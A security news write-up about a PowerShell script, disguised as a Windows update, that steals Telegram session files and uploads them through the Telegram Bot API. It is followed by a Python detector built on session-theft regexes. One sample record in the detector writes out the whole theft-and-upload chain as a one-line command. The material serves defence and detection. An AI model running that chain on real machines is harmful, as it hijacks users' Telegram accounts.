Cybersecurity experts have recently detected a malicious PowerShell script hosted on Pastebin, engineered to covertly steal session data from Telegram users. This script targets both desktop and web versions of Telegram, posing a significant risk to user privacy and security.
Disguised Under a Deceptive Name
The script masquerades as a typical Windows update, cleverly named “Windows Telemetry Update,” which misleads users into executing it without suspicion. Upon activation, it swiftly gathers host information such as the username, computer name, and public IP using api.ipify[.]org, before focusing on its primary goal of capturing Telegram session files.
These session files, found within the %APPDATA% directories for Telegram Desktop and Telegram Desktop Beta, are compressed into a file named “diag.zip” and temporarily stored in the user’s TEMP folder. The script’s deceptive nature makes it a high-severity threat, as identified by Flare analysts who continuously monitor Pastebin and similar platforms for malicious content.
Detailed Analysis and Development
According to the analysis, this script is specifically designed to steal Telegram session data and transmit it via the Telegram Bot API. It operates alongside another tool targeting web-based sessions, sharing the same infrastructure. Simple as it is, the script offers insight into how session-stealing tools are developed and tested.
Two versions of the script were discovered on Pastebin, both posted by the same user. The first version failed to send the “diag.zip” file due to a flawed multipart upload implementation. The operator later rectified this in the second version, which successfully uses the sendDocument endpoint with proper encoding, illustrating the debugging and refinement process publicly visible on Pastebin.
Operational Implications and Security Measures
Although the script lacks obfuscation and any automatic execution mechanism, its confirmed functionality indicates a potential for broader deployment. Security experts note that the script may still be in testing but could soon be used in larger-scale operations.
The infection begins when the script is manually run; it queries the Telegram Bot API and retrieves bot telemetry. After identifying Telegram installations, the script force-closes Telegram processes to unlock the session files before compressing them. It then uploads the archive to the operator via the bot API, with a fallback method to ensure delivery. After the upload, the script deletes its traces to avoid detection.
For immediate protection, users should terminate all active Telegram sessions, change passwords, enable two-factor authentication, and review account activity. Network administrators should block the domains the script contacts, such as api.ipify[.]org, or monitor for unusual calls to the Telegram Bot API to prevent further breaches.
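The behaviour chain described above (host recon via api.ipify.org, the Telegram Desktop directories under %APPDATA%, killing Telegram, staging diag.zip in TEMP, the sendDocument upload and the cleanup) maps directly onto PowerShell script-block logging. The triage logic below is an added example written for this article, not the script or any Flare tooling; the regexes and the sample Event ID 4104 record texts are constructed for illustration.

```python
import re

# One regex per behaviour the write-up describes (constructed patterns, not from the script).
INDICATORS = {
    "host_recon_ipify": re.compile(r"api\.ipify\.org", re.I),
    "telegram_session_dir": re.compile(r"APPDATA.{0,40}Telegram Desktop( Beta)?", re.I),
    "telegram_process_kill": re.compile(r"(Stop-Process|taskkill)[^\n]{0,80}telegram", re.I),
    "diag_zip_in_temp": re.compile(r"TEMP.{0,40}diag\.zip", re.I),
    "bot_api_send_document": re.compile(r"api\.telegram\.org/bot[^/\s]+/sendDocument", re.I),
    "cleanup_after_upload": re.compile(r"Remove-Item[^\n]{0,80}diag\.zip", re.I),
}

def match_indicators(script_text: str) -> list[str]:
    """Names of all indicators present in one script-block text, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]

def verdict(matched: list[str]) -> str:
    """Bot API upload combined with any Telegram session handling is high on its own;
    three or more behaviours is high; two is worth an analyst's look; else low."""
    telegram_touch = {"telegram_session_dir", "telegram_process_kill"} & set(matched)
    if "bot_api_send_document" in matched and telegram_touch:
        return "high"
    if len(matched) >= 3:
        return "high"
    return "medium" if len(matched) == 2 else "low"

def triage(records):
    """records: iterable of (record_id, script_block_text) taken from Event ID 4104."""
    rows = []
    for rid, text in records:
        matched = match_indicators(text)
        rows.append({"id": rid, "matched": matched, "verdict": verdict(matched)})
    return rows

# Constructed sample script-block texts: one mirroring the described chain, one legitimate
# log archive that happens to use the same file name, one admin backup touching Telegram.
SAMPLE_RECORDS = [
    (1, 'Invoke-RestMethod https://api.ipify.org; $p = "$env:APPDATA\\Telegram Desktop"; '
        'Stop-Process -Name Telegram -Force; Compress-Archive $p "$env:TEMP\\diag.zip"; '
        'Invoke-RestMethod https://api.telegram.org/bot<TOKEN>/sendDocument -Method Post; '
        'Remove-Item "$env:TEMP\\diag.zip"'),
    (2, 'Compress-Archive -Path C:\\ServiceLogs -DestinationPath "$env:TEMP\\diag.zip"'),
    (3, 'Stop-Process -Name Telegram; Copy-Item "$env:APPDATA\\Telegram Desktop" D:\\Backup -Recurse'),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_RECORDS):
        print(row)
```

Feed it the message text of real 4104 records (for example from Get-WinEvent on Microsoft-Windows-PowerShell/Operational) and treat a "high" verdict as a prompt to pull the full script block, not as a conviction on its own.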
